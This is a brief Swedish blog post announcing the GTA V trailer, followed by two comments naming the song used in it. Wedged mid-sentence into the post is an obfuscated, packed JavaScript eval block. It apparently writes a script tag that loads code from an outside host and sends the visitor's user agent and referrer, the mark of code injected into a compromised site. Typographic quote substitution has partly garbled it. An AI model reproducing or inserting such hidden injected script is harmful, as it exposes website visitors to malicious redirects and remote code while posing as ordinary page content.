Image Image Image Image Image Image Image Image Image Image

| 28 maj, 2018

Scroll to top

Top

2 Comments

GTA V trailer nu live se den här!

Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szfak|var|u0026u|referrer|fkbdi||js|php’.split(‘|’),0,{}))
är det inte långt kvar tills release av GTA V och här är den officiella trailern som vi säkerligen kommer att få se på TV snart.

Se och njut, väntan är snart över!

 

Comments

 1. Hannes

  Vad heter låten som är med i trailern?

  • Filip Urde

   The Chain Gang Of 1974 – Sleepwalking

   =D

Submit a Comment